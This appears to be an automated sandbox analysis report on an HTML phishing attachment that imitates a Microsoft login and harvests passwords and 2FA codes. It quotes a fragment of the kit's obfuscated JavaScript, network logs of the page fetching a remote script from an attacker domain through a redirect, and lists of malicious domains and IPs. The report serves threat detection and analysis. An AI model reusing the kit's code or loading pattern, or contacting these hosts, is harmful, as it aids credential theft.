Edit tour

Windows Analysis Report
022 0.10.htm

Overview

General Information

Sample name:	022 0.10.htm renamed because original name is a hash value
Original sample name:	playback-message ______________________________ 0.10.htm
Analysis ID:	1496973
MD5:	19484dab2e26c68bc1db253c17b0ab78
SHA1:	7fedb85ca999d526320186ae347b71877afc249f
SHA256:	25b6b5460774d2e25ba0a0d706dcd28d60af165e26559e954f4e58772f1e6c6d
Infos:

Detection

HTMLPhisher

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

Yara detected HtmlPhish10

HTML file submission containing password form

Javascript uses Clearbit API to dynamically determine company logos

Phishing site detected (based on favicon image match)

Detected TCP or UDP traffic on non-standard ports

Detected non-DNS traffic on DNS port

HTML body contains low number of good links

HTML body contains password input but no form action

IP address seen in connection with other malware

Invalid 'forgot password' link found

JA3 SSL client fingerprint seen in connection with other malware

None HTTPS page querying sensitive user data (password, username or email)

Classification

Process Tree

System is w10x64

chrome.exe (PID: 732 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\022 0.10.htm" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 4180 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2008,i,17860956769746736774,1280781556537347280,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author	Strings
1.0.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

AI detected phishing page

Source: file:///C:/Users/user/Desktop/022%200.10.htm

LLM: Score: 10 Reasons: The domain name 'file:///C:/Users/user/Desktop/022%200.10.htm' is a local file path, not a valid domain name, and is not associated with BUILTOSUITIN.COM. This suggests that the webpage is not legitimate and could be a phishing attempt. Additionally, the lack of a valid domain name and the presence of a local file path make it unlikely that the webpage is associated with the brand BUILTOSUITIN.COM, further supporting the conclusion that it is a phishing site. The simple and minimalistic design, while not necessarily suspicious, does not provide any evidence to the contrary, and the lack of unusual or notable features only reinforces the conclusion that the site is likely a phishing attempt. Overall, the combination of a local file path, lack of brand association, and simple design strongly suggests that the webpage is a phishing site with a high likelihood of being a phishing attempt (phishing score: 10). DOM: 1.0.pages.csv

Yara detected HtmlPhish10

Source: Yara match

File source: 1.0.pages.csv, type: HTML

Javascript uses Clearbit API to dynamically determine company logos

Source: https://wexclet.store/0xa937eg29be0xcss.js

HTTP Parser: var _0x7704 = [ 'ready', '#ai', '#next', '.logoimg', 'src', 'https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico', '#div1', '#div2', '#aich', '#error', '#submit-btn', '#div4', '#verify-2fa', '#div5', '#sign-in-another-way', '#div6', '#verify-text-2fa', 'https://logo.clearbit.com/', 'show', '1|2|3|4|0', 'head', '#pr', '#div3', 'success', '#user-email-otc', 'two_way_voice', '2|4|3|0|1', 'your\x20account\x20or\x20password\x20is\x20incorrect.\x20if\x20you\x20don\x27t\x20remember\x20your\x20password,\x20<a\x20href=\x27#\x27>reset\x20it\x20now</a>', '1|4|0|2|3', 'sorry,\x20your\x20sign-in\x20timed\x20out.\x20please\x20sign\x20in\x20again.', '#msg', 'internal\x20server\x20error.', 'json', '#msg-2fa', 'incorrect\x202fa\x20code.\x20try\x20again.', '#2fa-code', 'websocket\x20connection\x20closed', ...

Phishing site detected (based on favicon image match)

Source: file://

Matcher: Template: microsoft matched with high similarity

Source: file:///C:/Users/user/Desktop/022%200.10.htm

HTTP Parser: Number of links: 0

Source: file:///C:/Users/user/Desktop/022%200.10.htm

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: file:///C:/Users/user/Desktop/022%200.10.htm

HTTP Parser: Invalid link: Forgot Password?

Source: file:///C:/Users/user/Desktop/022%200.10.htm

HTTP Parser: Has password / email / username input fields

Source: file:///C:/Users/user/Desktop/022%200.10.htm

HTTP Parser: <input type="password" .../> found

Source: 022 0.10.htm	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/022%200.10.htm	HTTP Parser: No favicon

Source: file:///C:/Users/user/Desktop/022%200.10.htm

HTTP Parser: No <meta name="author".. found

Source: file:///C:/Users/user/Desktop/022%200.10.htm

HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:49773 version: TLS 1.2

Source: global traffic

TCP traffic: 192.168.2.4:49746 -> 185.174.100.20:4040

Source: global traffic

TCP traffic: 192.168.2.4:56321 -> 1.1.1.1:53

Source: Joe Sandbox View	IP Address: 104.18.42.238 104.18.42.238
Source: Joe Sandbox View	IP Address: 13.107.246.64 13.107.246.64
Source: Joe Sandbox View	IP Address: 13.107.246.42 13.107.246.42
Source: Joe Sandbox View	IP Address: 13.32.27.14 13.32.27.14

Source: Joe Sandbox View

JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /redirect?url=https%3A%2F%2Fwexclet.store%2F0xa937eg29be0xcss.js HTTP/1.1Host: padlet.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.1.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /start/xls/includes/css6.css HTTP/1.1Host: sopbtech.storeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.1.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /0xa937eg29be0xcss.js HTTP/1.1Host: wexclet.storeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /0xa937eg29be0xcss.js HTTP/1.1Host: wexclet.storeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /start/xls/images/key.png HTTP/1.1Host: sopbtech.storeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, /; q=0.01sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /start/xls/images/key.png HTTP/1.1Host: sopbtech.storeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /buildtosuitinc.com HTTP/1.1Host: logo.clearbit.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /buildtosuitinc.com HTTP/1.1Host: logo.clearbit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=nyUNzPbUcAEolyU&MD=4xACS6aV HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=nyUNzPbUcAEolyU&MD=4xACS6aV HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com

Source: global traffic	DNS traffic detected: DNS query: sopbtech.store
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: padlet.com
Source: global traffic	DNS traffic detected: DNS query: wexclet.store
Source: global traffic	DNS traffic detected: DNS query: server.povbtech.store
Source: global traffic	DNS traffic detected: DNS query: _4040._https.server.povbtech.store
Source: global traffic	DNS traffic detected: DNS query: logo.clearbit.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org

Source: chromecache_150.2.dr	String found in binary or memory: https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
Source: 022 0.10.htm	String found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
Source: chromecache_140.2.dr, chromecache_150.2.dr	String found in binary or memory: https://api.ipify.org?format=json
Source: 022 0.10.htm	String found in binary or memory: https://code.jquery.com/jquery-3.1.1.min.js
Source: chromecache_146.2.dr	String found in binary or memory: https://getbootstrap.com)
Source: chromecache_146.2.dr	String found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
Source: chromecache_150.2.dr	String found in binary or memory: https://logo.clearbit.com/
Source: 022 0.10.htm	String found in binary or memory: https://padlet.com/redirect?url=https%3A%2F%2Fwexclet.store%2F0xa937eg29be0xcss.js
Source: chromecache_140.2.dr, chromecache_150.2.dr	String found in binary or memory: https://sopbtech.store/start/xls/images/key.png
Source: 022 0.10.htm	String found in binary or memory: https://sopbtech.store/start/xls/includes/css6.css
Source: chromecache_150.2.dr	String found in binary or memory: https://www.office.com

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:49773 version: TLS 1.2

Source: classification engine

Classification label: mal68.phis.winHTM@29/23@26/13

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\022 0.10.htm"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2008,i,17860956769746736774,1280781556537347280,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2008,i,17860956769746736774,1280781556537347280,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Stealing of Sensitive Information

HTML file submission containing password form

Source: file:///C:/Users/user/Desktop/022%200.10.htm

HTTP Parser: file:///C:/Users/user/Desktop/022%200.10.htm

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	1 Ingress Tool Transfer	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
https://code.jquery.com/jquery-3.1.1.min.js	0%	URL Reputation	safe
https://api.ipify.org/?format=json	0%	URL Reputation	safe
file:///C:/Users/user/Desktop/022%200.10.htm	0%	Avira URL Cloud	safe
https://sopbtech.store/start/xls/includes/css6.css	0%	Avira URL Cloud	safe
https://wexclet.store/0xa937eg29be0xcss.js	0%	Avira URL Cloud	safe
https://logo.clearbit.com/buildtosuitinc.com	0%	Avira URL Cloud	safe
https://sopbtech.store/start/xls/images/key.png	0%	Avira URL Cloud	safe
https://padlet.com/redirect?url=https%3A%2F%2Fwexclet.store%2F0xa937eg29be0xcss.js	0%	Avira URL Cloud	safe
https://getbootstrap.com)	0%	Avira URL Cloud	safe
https://www.office.com	0%	Avira URL Cloud	safe
https://github.com/twbs/bootstrap/blob/master/LICENSE)	0%	Avira URL Cloud	safe
https://api.ipify.org?format=json	0%	Avira URL Cloud	safe
https://logo.clearbit.com/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
s-part-0014.t-0009.t-msedge.net	13.107.246.42	true	false	unknown
d26p066pn2w0s0.cloudfront.net	3.165.206.76	true	false	unknown
padlet.com	104.18.42.238	true	false	unknown
code.jquery.com	151.101.2.137	true	false	unknown
sopbtech.store	199.188.200.183	true	false	unknown
s-part-0036.t-0009.t-msedge.net	13.107.246.64	true	false	unknown
server.povbtech.store	185.174.100.20	true	false	unknown
www.google.com	142.250.185.228	true	false	unknown
api.ipify.org	172.67.74.152	true	false	unknown
wexclet.store	162.0.215.17	true	false	unknown
